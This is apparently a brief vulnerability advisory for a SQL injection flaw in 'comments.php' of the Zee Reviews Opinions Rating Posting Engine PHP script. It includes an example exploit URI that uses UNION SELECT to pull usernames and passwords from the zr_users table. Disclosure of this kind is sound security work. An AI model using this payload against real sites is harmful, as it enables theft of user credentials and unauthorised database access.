Zee Reviews Opinions Rating Posting Engine PHP Script 'comments.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

Zee Reviews Opinions Rating Posting Engine PHP Script 'comments.php' SQL Injection Vulnerability

An attacker can exploit these issues via a browser.

The following example URI is available:

http://www.example.com/comments.php?ItemID=1+UNION+SELECT+CONCAT_WS(0x3a,username,password)+FROM+zr_users--